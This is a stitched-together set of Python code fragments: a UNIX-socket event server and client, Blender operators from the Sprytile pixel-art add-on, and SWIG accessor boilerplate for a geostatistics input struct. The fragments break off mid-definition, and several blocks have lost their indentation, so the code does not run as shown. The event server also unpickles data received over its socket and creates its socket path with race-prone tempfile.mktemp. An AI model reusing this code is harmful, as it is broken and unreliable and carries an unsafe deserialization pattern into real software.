class EventServerRequestHandler(socketserver.BaseRequestHandler):
  """Request handler for the event server.

  Each connected client gets one handler instance running in its own
  thread; a companion daemon thread drains the per-client queue and
  forwards broadcast messages back to the client.

  This class is agnostic to message format (except for logging).
  """

  def setup(self):
    socketserver.BaseRequestHandler.setup(self)
    threading.current_thread().name = (
        'EventServerRequestHandler-%d' % get_unique_id())
    # A thread to be used to send messages that are posted to the queue.
    self.send_thread = None
    # A queue containing messages.
    self.queue = queue.Queue()

  def handle(self):
    # The handle() method is run in a separate thread per client
    # (since EventServer has ThreadingMixIn).
    logging.debug('Event server: handling new client')
    try:
      self.server._subscribe(self.queue) # pylint: disable=protected-access
      # Send hello, now that we've subscribed. Client will wait for
      # it before returning from the constructor.
      self.request.send(_HELLO_MESSAGE)
      self.send_thread = process_utils.StartDaemonThread(
          target=self._run_send_thread,
          name='EventServerSendThread-%d' % get_unique_id())
      # Process events: continuously read message and broadcast to all
      # clients' queues.
      while True:
        msg = self.request.recv(_MAX_MESSAGE_SIZE + 1)
        if len(msg) > _MAX_MESSAGE_SIZE:
          # NOTE(review): the oversized (truncated) message is logged
          # here but still dispatched below.
          logging.error('Event server: message too large')
        if not msg:
          break # EOF
        self.server._post_message(msg) # pylint: disable=protected-access
    except socket.error as e:
      if e.errno in [errno.ECONNRESET, errno.ESHUTDOWN, errno.EPIPE]:
        pass # Client just quit
      else:
        raise
    finally:
      logging.debug('Event server: client disconnected')
      self.queue.put(None) # End of stream; make writer quit
      self.server._unsubscribe(self.queue) # pylint: disable=protected-access

  def _run_send_thread(self):
    # Drains self.queue, forwarding each message to this client.  A None
    # sentinel (posted on disconnect) or any send failure ends the thread.
    while True:
      message = self.queue.get()
      if message is None:
        return
      try:
        self.request.send(message)
      except Exception:
        return
class EventServer(socketserver.ThreadingUnixStreamServer):
  """An event server that broadcasts messages to all clients.

  This class is agnostic to message format (except for logging).
  """
  allow_reuse_address = True
  # Use seqpacket so each send/recv is a whole datagram-like record.
  socket_type = socket.SOCK_SEQPACKET
  daemon_threads = True

  def __init__(self, path=None):
    """Constructor.

    Args:
      path: Path at which to create a UNIX stream socket.
        If None, uses a temporary path and sets the CROS_FACTORY_EVENT
        environment variable for future clients to use.
    """
    # pylint: disable=super-init-not-called
    # A set of queues listening to messages.
    self._queues = set()
    # A lock guarding the _queues variable.
    self._lock = threading.Lock()
    self._temp_path = None
    if not path:
      # NOTE(review): tempfile.mktemp is race-prone (the name can be
      # claimed between generation and bind); acceptable only because
      # this path lives in the factory-local trust domain.
      path = tempfile.mktemp(prefix='cros_factory_event.')
      os.environ[CROS_FACTORY_EVENT] = path
      logging.info('Setting %s=%s', CROS_FACTORY_EVENT, path)
      self._temp_path = path
    # pylint: disable=non-parent-init-called
    socketserver.UnixStreamServer.__init__(
        self, path, EventServerRequestHandler)

  def server_close(self):
    """Cleanup temporary file"""
    socketserver.ThreadingUnixStreamServer.server_close(self)
    if self._temp_path is not None:
      file_utils.TryUnlink(self._temp_path)

  def _subscribe(self, q):
    """Subscribes a queue to receive events.

    Invoked only from the request handler.
    """
    with self._lock:
      self._queues.add(q)

  def _unsubscribe(self, q):
    """Unsubscribes a queue so it no longer receives events.

    Invoked only from the request handler.
    """
    with self._lock:
      self._queues.discard(q)

  def _post_message(self, message):
    """Posts a message to all clients.

    Invoked only from the request handler.
    """
    try:
      # pickle.loads here is for debug logging only; messages come from
      # local, trusted factory processes over the UNIX socket.
      if logging.getLogger().isEnabledFor(logging.DEBUG):
        logging.debug('Event server: dispatching object %s',
                      pickle.loads(message))
    except Exception:
      # Message isn't parseable as a pickled object; weird!
      logging.info(
          'Event server: dispatching message %r', message)
    with self._lock:
      for q in self._queues:
        # Note that this is nonblocking (even if one of the
        # clients is dead).
        q.put(message)
class EventClientBase(metaclass=abc.ABCMeta):
"""A client used to post and receive messages from an event server.
All events sent through this class must be subclasses of Event. It
marshals Event classes through the server by pickling them.
The _process_event() need to be called periodically.
Inherit graph:
EventClientBase:
|-- ThreadingEventClient: A daemon thread to process events.
|-- BlockingEventClient: A while-loop on calling thread to process events.
"""
  def __init__(self, path=None, callback=None):
    """Constructor.

    Args:
      path: The UNIX seqpacket socket endpoint path. If None, uses
        the CROS_FACTORY_EVENT environment variable.
      callback: A callback to call when events occur. The callback
        takes one argument: the received event.
    """
    # Connect first; _ConnectSocket blocks until the server's hello.
    self.socket = self._ConnectSocket(path)
    # Registered event callbacks; guarded by _lock in subclasses.
    self.callbacks = set()
    logging.debug('Initializing event client')
    if callback:
      self.callbacks.add(callback)
    self._lock = threading.Lock()
def close(self):
"""Closes the client."""
if self.socket:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
self.socket = None
  def is_closed(self):
    """Returns True once close() has run (the socket has been released)."""
    return self.socket is None
def _ConnectSocket(self, path):
s = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
path = path or os.environ[CROS_FACTORY_EVENT]
s.connect(path)
hello = s.recv(len(_HELLO_MESSAGE))
if hello != _HELLO_MESSAGE:
raise socket.error('Event client expected hello (%r) but got %r' %
_HELLO_MESSAGE, hello)
return s
  def __del__(self):
    # Best-effort cleanup at garbage collection; close() is a no-op on an
    # already-closed client.
    self.close()
  def __enter__(self):
    # Context-manager entry; the client itself is the managed resource.
    return self
  def __exit__(self, exc_type, exc_value, traceback):
    # pylint: disable=redefined-outer-name
    del exc_type, exc_value, traceback # Unused.
    # Close on scope exit.  Errors from close() are swallowed, and any
    # exception raised inside the with-block propagates (returns False).
    try:
      self.close()
    except Exception:
      pass
    return False
def _truncate_event_for_debug_log(self, event):
"""Truncates event to a size of _MAX_EVENT_SIZE_FOR_DEBUG_LOG.
Args:
event: The event to be printed.
Returns:
Truncated event string representation.
| |
obj.sprytile_gridid = curr_mat.grids[idx].id
bpy.ops.sprytile.build_grid_list()
class UTIL_OP_SprytileNewMaterial(bpy.types.Operator):
    """Operator: create a new shadeless material on the active mesh object."""
    bl_idname = "sprytile.add_new_material"
    bl_label = "New Shadeless Material"
    bl_description = "Create a new shadeless material"

    @classmethod
    def poll(cls, context):
        # Requires an active object; the mesh-type check happens in invoke.
        return context.object is not None

    def invoke(self, context, event):
        obj = context.object
        if obj.type != 'MESH':
            return {'FINISHED'}
        # Create the material and assign it to a fresh slot on the object
        mat = bpy.data.materials.new(name="Material")
        set_idx = len(obj.material_slots)
        bpy.ops.object.material_slot_add()
        obj.active_material_index = set_idx
        obj.material_slots[set_idx].material = mat
        # Build the shadeless node setup and refresh the tile grid data
        bpy.ops.sprytile.material_setup('INVOKE_DEFAULT')
        bpy.ops.sprytile.validate_grids('INVOKE_DEFAULT')
        bpy.data.materials.update()
        return {'FINISHED'}
class UTIL_OP_SprytileSetupMaterial(bpy.types.Operator):
    """Operator: rebuild the active material's node tree as shadeless."""
    bl_idname = "sprytile.material_setup"
    bl_label = "Set Material to Shadeless"
    bl_description = "Make current selected material shadeless, for pixel art texture purposes"

    @classmethod
    def poll(cls, context):
        return context.object is not None

    def execute(self, context):
        # Delegate to invoke so both execution paths share one code path.
        return self.invoke(context, None)

    def invoke(self, context, event):
        obj = context.object
        if obj.type != 'MESH' or len(obj.material_slots) == 0:
            return {'FINISHED'}
        mat = obj.material_slots[obj.active_material_index].material
        # Make material equivalent to a shadeless transparent one in Blender 2.7
        mat.use_nodes = True
        mat.blend_method = 'CLIP'
        # Get the material texture (if any) so we can keep it
        mat_texture = get_material_texture(mat)
        # Setup nodes: texture color drives an emission shader, mixed with
        # transparency by texture alpha; the light-path mix restricts the
        # emission to camera rays (shadeless look)
        nodes = mat.node_tree.nodes
        nodes.clear()
        output_n = nodes.new(type = 'ShaderNodeOutputMaterial')
        light_path_n = nodes.new(type = 'ShaderNodeLightPath')
        transparent_n = nodes.new(type = 'ShaderNodeBsdfTransparent')
        emission_n = nodes.new(type = 'ShaderNodeEmission')
        mix_cam_ray_n = nodes.new(type = 'ShaderNodeMixShader')
        mix_alpha_n = nodes.new(type = 'ShaderNodeMixShader')
        texture_n = nodes.new(type = 'ShaderNodeTexImage')
        # link
        links = mat.node_tree.links
        links.new(texture_n.outputs['Color'], emission_n.inputs['Color'])
        links.new(texture_n.outputs['Alpha'], mix_alpha_n.inputs['Fac'])
        links.new(transparent_n.outputs['BSDF'], mix_alpha_n.inputs[1])
        links.new(transparent_n.outputs['BSDF'], mix_cam_ray_n.inputs[1])
        links.new(emission_n.outputs['Emission'], mix_alpha_n.inputs[2])
        links.new(mix_alpha_n.outputs['Shader'], mix_cam_ray_n.inputs[2])
        links.new(light_path_n.outputs['Is Camera Ray'], mix_cam_ray_n.inputs['Fac'])
        links.new(mix_cam_ray_n.outputs['Shader'], output_n.inputs['Surface'])
        # reorder: lay nodes out left-to-right for readability in the editor
        output_n.location = (400, 0)
        mix_cam_ray_n.location = (200, 0)
        light_path_n.location = (0, 250)
        mix_alpha_n.location = (0, -100)
        transparent_n.location = (-200, -100)
        emission_n.location = (-200, -200)
        texture_n.location = (-500, 100)
        # Restore the previously assigned texture image, if there was one
        if mat_texture:
            texture_n.image = mat_texture
        return {'FINISHED'}
class UTIL_OP_SprytileSetupViewport(bpy.types.Operator):
    """Operator: apply pixel-art friendly viewport/render settings."""
    bl_idname = "sprytile.viewport_setup"
    bl_label = "Setup Pixel Viewport"
    bl_description = "Set optimal 3D viewport settings for pixel art"

    def execute(self, context):
        # Delegate to invoke so both execution paths share one code path.
        return self.invoke(context, None)

    def invoke(self, context, event):
        # Disable Eevee's TAA, which causes noticeable artefacts with pixel art
        context.scene.eevee.taa_samples = 1
        context.scene.eevee.use_taa_reprojection = False
        # Set view transform to standard, for correct texture brightness
        context.scene.view_settings.view_transform = 'Standard'
        # Reflect changes
        context.scene.update_tag()
        for area in context.screen.areas:
            area.tag_redraw()
        return {'FINISHED'}
class UTIL_OP_SprytileLoadTileset(bpy.types.Operator, ImportHelper):
    """Operator: load a tileset image into the current material."""
    bl_idname = "sprytile.tileset_load"
    bl_label = "Load Tileset"
    bl_description = "Load a tileset into the current material"

    # For some reason this full list doesn't really work,
    # reordered the list to prioritize common file types
    # filter_ext = "*" + ";*".join(bpy.path.extensions_image.sort())
    filter_glob: bpy.props.StringProperty(
        default="*.bmp;*.psd;*.hdr;*.rgba;*.jpg;*.png;*.tiff;*.tga;*.jpeg;*.jp2;*.rgb;*.dds;*.exr;*.psb;*.j2c;*.dpx;*.tif;*.tx;*.cin;*.pdd;*.sgi",
        options={'HIDDEN'},
    )

    def execute(self, context):
        if context.object.type != 'MESH':
            return {'FINISHED'}
        # Check object material count, if 0 create a new material before loading
        if len(context.object.material_slots.items()) < 1:
            bpy.ops.sprytile.add_new_material('INVOKE_DEFAULT')
        UTIL_OP_SprytileLoadTileset.load_tileset_file(context, self.filepath)
        return {'FINISHED'}

    @staticmethod
    def load_tileset_file(context, filepath):
        """Loads the image at filepath into the object's active material,
        renaming the material after the file's base name."""
        obj = context.object
        # NOTE(review): rindex raises ValueError if filepath lacks a path
        # separator or an extension -- presumably ImportHelper always
        # supplies a full path with extension; confirm.
        # texture_name is currently unused.
        texture_name = filepath[filepath.rindex(path.sep) + 1:]
        material_name = filepath[filepath.rindex(path.sep) + 1: filepath.rindex('.')]
        bpy.ops.sprytile.material_setup()
        target_mat = obj.material_slots[obj.active_material_index].material
        target_mat.name = material_name
        loaded_img = bpy.data.images.load(filepath)
        set_material_texture(target_mat, loaded_img)
        # Apply pixel-art sampling and refresh the tile grid data
        bpy.ops.sprytile.texture_setup('INVOKE_DEFAULT')
        bpy.ops.sprytile.validate_grids('INVOKE_DEFAULT')
        bpy.data.textures.update()
class UTIL_OP_SprytileNewTileset(bpy.types.Operator, ImportHelper):
    """Operator: create a new material and load a tileset image into it."""
    bl_idname = "sprytile.tileset_new"
    bl_label = "Add Tileset"
    bl_description = "Create a new material and load another tileset"

    # For some reason this full list doesn't really work,
    # reordered the list to prioritize common file types
    # filter_ext = "*" + ";*".join(bpy.path.extensions_image.sort())
    filter_glob: bpy.props.StringProperty(
        default="*.bmp;*.psd;*.hdr;*.rgba;*.jpg;*.png;*.tiff;*.tga;*.jpeg;*.jp2;*.rgb;*.dds;*.exr;*.psb;*.j2c;*.dpx;*.tif;*.tx;*.cin;*.pdd;*.sgi",
        options={'HIDDEN'},
    )

    def execute(self, context):
        if context.object.type != 'MESH':
            return {'FINISHED'}
        # Always create a fresh material, then reuse the shared loader
        bpy.ops.sprytile.add_new_material('INVOKE_DEFAULT')
        UTIL_OP_SprytileLoadTileset.load_tileset_file(context, self.filepath)
        return {'FINISHED'}
class UTIL_OP_SprytileSetupTexture(bpy.types.Operator):
    """Operator: set the material's image sampling to nearest-neighbor."""
    bl_idname = "sprytile.texture_setup"
    bl_label = "Setup Pixel Texture"
    bl_description = "Change texture settings for crunchy pixelart style"

    def execute(self, context):
        # Delegate to invoke so both execution paths share one code path.
        return self.invoke(context, None)

    def invoke(self, context, event):
        self.setup_tex(context)
        return {'FINISHED'}

    @staticmethod
    def setup_tex(context):
        """Sets the active material's image texture node interpolation to
        'Closest' (nearest-neighbor) for crisp pixel-art rendering."""
        obj = context.object
        if obj.type != 'MESH':
            return
        material = obj.material_slots[obj.active_material_index].material
        # Legacy Blender 2.7 texture-slot handling, kept for reference:
        #target_texture = None
        #target_img = None
        #target_slot = None
        # for texture_slot in material.texture_slots:
        #     if texture_slot is None:
        #         continue
        #     if texture_slot.texture is None:
        #         continue
        #     if texture_slot.texture.type == 'NONE':
        #         continue
        #     if texture_slot.texture.type == 'IMAGE':
        #         # Cannot use the texture slot image reference directly
        #         # Have to get it through bpy.data.images to be able to use with BGL
        #         target_texture = bpy.data.textures.get(texture_slot.texture.name)
        #         target_img = bpy.data.images.get(texture_slot.texture.image.name)
        #         target_slot = texture_slot
        #         break
        # if target_texture is None or target_img is None:
        #     return
        target_node = get_material_texture_node(material)
        if not target_node:
            return
        target_node.interpolation = 'Closest'
        # NOTE(review): target_img is assigned but never used below.
        target_img = target_node.image
        # We don't have these in 2.8, but the behaviour with nodes and Closest filtering is equivalent.
        # However, 2.8 doesn't currently offer an option to disable mipmaps?
        # target_texture.use_preview_alpha = True
        # target_texture.use_alpha = True
        # target_texture.use_interpolation = False
        # target_texture.use_mipmap = False
        # target_texture.filter_type = 'BOX'
        # target_texture.filter_size = 0.10
        # target_slot.use_map_color_diffuse = True
        # target_slot.use_map_alpha = True
        # target_slot.alpha_factor = 1.0
        # target_slot.diffuse_color_factor = 1.0
        # target_slot.texture_coords = 'UV'
class UTIL_OP_SprytileValidateGridList(bpy.types.Operator):
    """Repair scene.sprytile_mats so every entry maps to a live material.

    Rebinds entries whose material appears to have been renamed, drops
    entries whose material no longer exists (or has zero users), ensures
    every used material has at least one grid entry, then rebuilds the
    display list via the build_grid_list operator.
    """
    bl_idname = "sprytile.validate_grids"
    bl_label = "Validate Tile Grids"
    bl_description = "Press if tile grids are not displaying properly"

    @classmethod
    def poll(cls, context):
        return True

    def execute(self, context):
        return self.invoke(context, None)

    def invoke(self, context, event):
        self.validate_grids(context)
        return {'FINISHED'}

    @staticmethod
    def validate_grids(context):
        mat_list = bpy.data.materials
        mat_data_list = context.scene.sprytile_mats
        # Validate the material IDs in scene.sprytile_mats
        for check_mat_data in mat_data_list:
            mat_idx = mat_list.find(check_mat_data.mat_id)
            if mat_idx > -1:
                continue
            # This mat data id not found in materials
            # Loop through materials looking for one
            # that doesn't appear in sprytile_mats list
            for check_mat in mat_list:
                mat_unused = True
                for mat_data in mat_data_list:
                    if mat_data.mat_id == check_mat.name:
                        mat_unused = False
                        break
                if mat_unused:
                    # Rebind this entry (plus its grids and any display
                    # rows) to the unclaimed material — presumably the
                    # entry's material was renamed to this one.
                    target_mat_id = check_mat_data.mat_id
                    check_mat_data.mat_id = check_mat.name
                    for grid in check_mat_data.grids:
                        grid.mat_id = check_mat.name
                    for list_display in context.scene.sprytile_list.display:
                        if list_display.mat_id == target_mat_id:
                            list_display.mat_id = check_mat.name
                    break
        remove_idx = []
        # Filter out mat data with invalid IDs or users
        for idx, mat in enumerate(mat_data_list.values()):
            mat_idx = mat_list.find(mat.mat_id)
            if mat_idx < 0:
                remove_idx.append(idx)
                continue
            if (mat.mat_id == "Dots Stroke"):
                # "Dots Stroke" is Blender's built-in grease-pencil
                # material; never track it.
                remove_idx.append(idx)
                continue
            if mat_list[mat_idx].users == 0:
                remove_idx.append(idx)
            # Keep each grid's mat_id in sync with its owning entry
            for grid in mat.grids:
                grid.mat_id = mat.mat_id
        # Remove from the back so earlier indices stay valid
        remove_idx.reverse()
        for idx in remove_idx:
            mat_data_list.remove(idx)
        # Loop through available materials, checking if mat_data_list has
        # at least one entry for each material
        for mat in mat_list:
            if mat.users == 0:
                continue
            is_mat_valid = False
            for mat_data in mat_data_list:
                if mat_data.mat_id == mat.name:
                    is_mat_valid = True
                    break
            if is_mat_valid is False and mat.name != "Dots Stroke":
                # New material: create an entry with one starter grid
                mat_data_entry = mat_data_list.add()
                mat_data_entry.mat_id = mat.name
                mat_grid = mat_data_entry.grids.add()
                mat_grid.mat_id = mat.name
                mat_grid.id = get_highest_grid_id(context) + 1
                context.object.sprytile_gridid = get_highest_grid_id(context)
        bpy.ops.sprytile.build_grid_list()
class UTIL_OP_SprytileBuildGridList(bpy.types.Operator):
    bl_idname = "sprytile.build_grid_list"
    bl_label = "Sprytile Build Grid List"

    def execute(self, context):
        return self.invoke(context, None)

    def invoke(self, context, event):
        self.build_list(context)
        return {'FINISHED'}

    @staticmethod
    def build_list(context):
        """Rebuild scene.sprytile_list.display from scene.sprytile_mats.

        One header row per material entry; expanded entries also get one
        row per grid. The list selection index is pointed at the row whose
        grid matches the object's active sprytile_gridid.
        """
        scene = context.scene
        display = scene.sprytile_list.display
        display.clear()
        active_grid_id = context.object.sprytile_gridid
        for material_entry in scene.sprytile_mats:
            header_row = display.add()
            header_row.mat_id = material_entry.mat_id
            # Collapsed entries only show their header row
            if material_entry.is_expanded is False:
                continue
            for grid_entry in material_entry.grids:
                row_index = len(display)
                grid_row = display.add()
                grid_row.grid_id = grid_entry.id
                grid_row.parent_mat_name = header_row.mat_name
                grid_row.parent_mat_id = header_row.mat_id
                # Keep the UI selection on the currently active grid
                if active_grid_id == grid_row.grid_id:
                    scene.sprytile_list.idx = row_index
class UTIL_OP_SprytileRotateLeft(bpy.types.Operator):
    """Advance the Sprytile mesh-build rotation by ~90 degrees."""
    bl_idname = "sprytile.rotate_left"
    bl_label = "Rotate Sprytile Left"

    def execute(self, context):
        return self.invoke(context, None)

    def invoke(self, context, event):
        sprytile_data = context.scene.sprytile_data
        # Step by ~pi/2 radians; wrap to zero past a full turn (~2*pi)
        rotation = sprytile_data.mesh_rotate + 1.5708
        if rotation > 6.28319:
            rotation = 0
        sprytile_data.mesh_rotate = rotation
        return {'FINISHED'}
class UTIL_OP_SprytileRotateRight(bpy.types.Operator):
    """Step the Sprytile mesh-build rotation back by ~90 degrees."""
    bl_idname = "sprytile.rotate_right"
    bl_label = "Rotate Sprytile Right"

    def execute(self, context):
        return self.invoke(context, None)

    def invoke(self, context, event):
        sprytile_data = context.scene.sprytile_data
        # Step by ~pi/2 radians; wrap to zero past a full negative turn (~-2*pi)
        rotation = sprytile_data.mesh_rotate - 1.5708
        if rotation < -6.28319:
            rotation = 0
        sprytile_data.mesh_rotate = rotation
        return {'FINISHED'}
class UTIL_OP_SprytileReloadImages(bpy.types.Operator):
    bl_idname = "sprytile.reload_imgs"
    bl_label = "Reload All Images"
    bl_description = "Automatically reload images referenced by the scene"

    def execute(self, context):
        # Consistency fix: every other Sprytile operator delegates
        # execute -> invoke so the operator also works when called
        # from scripts (which go through execute, not invoke).
        return self.invoke(context, None)

    def invoke(self, context, event):
        """Reload every image datablock from disk, then redraw any
        3D viewport / image editor so the refreshed textures show up."""
        for img in bpy.data.images:
            if img is None:
                continue
            img.reload()
        for window in context.window_manager.windows:
            for area in window.screen.areas:
                if area.type in {'VIEW_3D', 'IMAGE_EDITOR'}:
                    area.tag_redraw()
        return {'FINISHED'}
class UTIL_OP_SprytileReloadImagesAuto(bpy.types.Operator):
bl_idname = "sprytile.reload_auto"
bl_label = "Reload All Images (Auto)"
_timer = None
last_check_time = None
def modal(self, context, event):
if event.type == 'TIMER':
if context.scene.sprytile_data.auto_reload is False:
self.cancel(context)
return {'CANCELLED'}
if self.check_files():
for window in context.window_manager.windows:
for area in window.screen.areas:
if area.type in {'VIEW_3D', 'IMAGE_EDITOR'}:
area.tag_redraw()
return {'PASS_THROUGH'}
def check_files(self):
did_reload = False
for img in bpy.data.images:
if img is None:
continue
filepath = abspath(img.filepath)
if path.exists(filepath) is False:
continue
file_mod = path.getmtime(filepath)
filetime = datetime.fromtimestamp(file_mod)
if self.last_check_time is None or filetime > self.last_check_time:
print("Reloading", img.filepath)
img.reload()
did_reload = True
self.last_check_time = datetime.now()
return did_reload
def execute(self, context):
return self.invoke(context, | |
{}
    # --- SWIG-generated accessor boilerplate for the wrapped C struct. ---
    # Pattern repeated for every struct field: register the C-level
    # setter/getter in __swig_setmethods__/__swig_getmethods__ and, on
    # new-style class builds (_newclass), also expose the pair as a
    # Python property. Do not edit by hand; regenerate with SWIG.
    __setattr__ = lambda self, name, value: _swig_setattr(self, mpds_geosClassicInput, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, mpds_geosClassicInput, name)
    __repr__ = _swig_repr
    __swig_setmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicInput_consoleAppFlag_set
    __swig_getmethods__["consoleAppFlag"] = _geosclassic.mpds_geosClassicInput_consoleAppFlag_get
    if _newclass:
        consoleAppFlag = _swig_property(_geosclassic.mpds_geosClassicInput_consoleAppFlag_get, _geosclassic.mpds_geosClassicInput_consoleAppFlag_set)
    __swig_setmethods__["simName"] = _geosclassic.mpds_geosClassicInput_simName_set
    __swig_getmethods__["simName"] = _geosclassic.mpds_geosClassicInput_simName_get
    if _newclass:
        simName = _swig_property(_geosclassic.mpds_geosClassicInput_simName_get, _geosclassic.mpds_geosClassicInput_simName_set)
    __swig_setmethods__["simGrid"] = _geosclassic.mpds_geosClassicInput_simGrid_set
    __swig_getmethods__["simGrid"] = _geosclassic.mpds_geosClassicInput_simGrid_get
    if _newclass:
        simGrid = _swig_property(_geosclassic.mpds_geosClassicInput_simGrid_get, _geosclassic.mpds_geosClassicInput_simGrid_set)
    __swig_setmethods__["varName"] = _geosclassic.mpds_geosClassicInput_varName_set
    __swig_getmethods__["varName"] = _geosclassic.mpds_geosClassicInput_varName_get
    if _newclass:
        varName = _swig_property(_geosclassic.mpds_geosClassicInput_varName_get, _geosclassic.mpds_geosClassicInput_varName_set)
    __swig_setmethods__["formatString"] = _geosclassic.mpds_geosClassicInput_formatString_set
    __swig_getmethods__["formatString"] = _geosclassic.mpds_geosClassicInput_formatString_get
    if _newclass:
        formatString = _swig_property(_geosclassic.mpds_geosClassicInput_formatString_get, _geosclassic.mpds_geosClassicInput_formatString_set)
    __swig_setmethods__["outputMode"] = _geosclassic.mpds_geosClassicInput_outputMode_set
    __swig_getmethods__["outputMode"] = _geosclassic.mpds_geosClassicInput_outputMode_get
    if _newclass:
        outputMode = _swig_property(_geosclassic.mpds_geosClassicInput_outputMode_get, _geosclassic.mpds_geosClassicInput_outputMode_set)
    __swig_setmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicInput_outputImageFileName_set
    __swig_getmethods__["outputImageFileName"] = _geosclassic.mpds_geosClassicInput_outputImageFileName_get
    if _newclass:
        outputImageFileName = _swig_property(_geosclassic.mpds_geosClassicInput_outputImageFileName_get, _geosclassic.mpds_geosClassicInput_outputImageFileName_set)
    __swig_setmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicInput_outputReportFlag_set
    __swig_getmethods__["outputReportFlag"] = _geosclassic.mpds_geosClassicInput_outputReportFlag_get
    if _newclass:
        outputReportFlag = _swig_property(_geosclassic.mpds_geosClassicInput_outputReportFlag_get, _geosclassic.mpds_geosClassicInput_outputReportFlag_set)
    __swig_setmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicInput_outputReportFileName_set
    __swig_getmethods__["outputReportFileName"] = _geosclassic.mpds_geosClassicInput_outputReportFileName_get
    if _newclass:
        outputReportFileName = _swig_property(_geosclassic.mpds_geosClassicInput_outputReportFileName_get, _geosclassic.mpds_geosClassicInput_outputReportFileName_set)
    __swig_setmethods__["computationMode"] = _geosclassic.mpds_geosClassicInput_computationMode_set
    __swig_getmethods__["computationMode"] = _geosclassic.mpds_geosClassicInput_computationMode_get
    if _newclass:
        computationMode = _swig_property(_geosclassic.mpds_geosClassicInput_computationMode_get, _geosclassic.mpds_geosClassicInput_computationMode_set)
    __swig_setmethods__["covModel"] = _geosclassic.mpds_geosClassicInput_covModel_set
    __swig_getmethods__["covModel"] = _geosclassic.mpds_geosClassicInput_covModel_get
    if _newclass:
        covModel = _swig_property(_geosclassic.mpds_geosClassicInput_covModel_get, _geosclassic.mpds_geosClassicInput_covModel_set)
    __swig_setmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicInput_searchRadiusRelative_set
    __swig_getmethods__["searchRadiusRelative"] = _geosclassic.mpds_geosClassicInput_searchRadiusRelative_get
    if _newclass:
        searchRadiusRelative = _swig_property(_geosclassic.mpds_geosClassicInput_searchRadiusRelative_get, _geosclassic.mpds_geosClassicInput_searchRadiusRelative_set)
    __swig_setmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicInput_nneighborMax_set
    __swig_getmethods__["nneighborMax"] = _geosclassic.mpds_geosClassicInput_nneighborMax_get
    if _newclass:
        nneighborMax = _swig_property(_geosclassic.mpds_geosClassicInput_nneighborMax_get, _geosclassic.mpds_geosClassicInput_nneighborMax_set)
    __swig_setmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_set
    __swig_getmethods__["searchNeighborhoodSortMode"] = _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_get
    if _newclass:
        searchNeighborhoodSortMode = _swig_property(_geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_get, _geosclassic.mpds_geosClassicInput_searchNeighborhoodSortMode_set)
    __swig_setmethods__["ndataImage"] = _geosclassic.mpds_geosClassicInput_ndataImage_set
    __swig_getmethods__["ndataImage"] = _geosclassic.mpds_geosClassicInput_ndataImage_get
    if _newclass:
        ndataImage = _swig_property(_geosclassic.mpds_geosClassicInput_ndataImage_get, _geosclassic.mpds_geosClassicInput_ndataImage_set)
    __swig_setmethods__["dataImage"] = _geosclassic.mpds_geosClassicInput_dataImage_set
    __swig_getmethods__["dataImage"] = _geosclassic.mpds_geosClassicInput_dataImage_get
    if _newclass:
        dataImage = _swig_property(_geosclassic.mpds_geosClassicInput_dataImage_get, _geosclassic.mpds_geosClassicInput_dataImage_set)
    __swig_setmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicInput_ndataPointSet_set
    __swig_getmethods__["ndataPointSet"] = _geosclassic.mpds_geosClassicInput_ndataPointSet_get
    if _newclass:
        ndataPointSet = _swig_property(_geosclassic.mpds_geosClassicInput_ndataPointSet_get, _geosclassic.mpds_geosClassicInput_ndataPointSet_set)
    __swig_setmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicInput_dataPointSet_set
    __swig_getmethods__["dataPointSet"] = _geosclassic.mpds_geosClassicInput_dataPointSet_get
    if _newclass:
        dataPointSet = _swig_property(_geosclassic.mpds_geosClassicInput_dataPointSet_get, _geosclassic.mpds_geosClassicInput_dataPointSet_set)
    __swig_setmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicInput_maskImageFlag_set
    __swig_getmethods__["maskImageFlag"] = _geosclassic.mpds_geosClassicInput_maskImageFlag_get
    if _newclass:
        maskImageFlag = _swig_property(_geosclassic.mpds_geosClassicInput_maskImageFlag_get, _geosclassic.mpds_geosClassicInput_maskImageFlag_set)
    __swig_setmethods__["maskImage"] = _geosclassic.mpds_geosClassicInput_maskImage_set
    __swig_getmethods__["maskImage"] = _geosclassic.mpds_geosClassicInput_maskImage_get
    if _newclass:
        maskImage = _swig_property(_geosclassic.mpds_geosClassicInput_maskImage_get, _geosclassic.mpds_geosClassicInput_maskImage_set)
    __swig_setmethods__["meanUsage"] = _geosclassic.mpds_geosClassicInput_meanUsage_set
    __swig_getmethods__["meanUsage"] = _geosclassic.mpds_geosClassicInput_meanUsage_get
    if _newclass:
        meanUsage = _swig_property(_geosclassic.mpds_geosClassicInput_meanUsage_get, _geosclassic.mpds_geosClassicInput_meanUsage_set)
    __swig_setmethods__["meanValue"] = _geosclassic.mpds_geosClassicInput_meanValue_set
    __swig_getmethods__["meanValue"] = _geosclassic.mpds_geosClassicInput_meanValue_get
    if _newclass:
        meanValue = _swig_property(_geosclassic.mpds_geosClassicInput_meanValue_get, _geosclassic.mpds_geosClassicInput_meanValue_set)
    __swig_setmethods__["meanImage"] = _geosclassic.mpds_geosClassicInput_meanImage_set
    __swig_getmethods__["meanImage"] = _geosclassic.mpds_geosClassicInput_meanImage_get
    if _newclass:
        meanImage = _swig_property(_geosclassic.mpds_geosClassicInput_meanImage_get, _geosclassic.mpds_geosClassicInput_meanImage_set)
    __swig_setmethods__["varianceUsage"] = _geosclassic.mpds_geosClassicInput_varianceUsage_set
    __swig_getmethods__["varianceUsage"] = _geosclassic.mpds_geosClassicInput_varianceUsage_get
    if _newclass:
        varianceUsage = _swig_property(_geosclassic.mpds_geosClassicInput_varianceUsage_get, _geosclassic.mpds_geosClassicInput_varianceUsage_set)
    __swig_setmethods__["varianceValue"] = _geosclassic.mpds_geosClassicInput_varianceValue_set
    __swig_getmethods__["varianceValue"] = _geosclassic.mpds_geosClassicInput_varianceValue_get
    if _newclass:
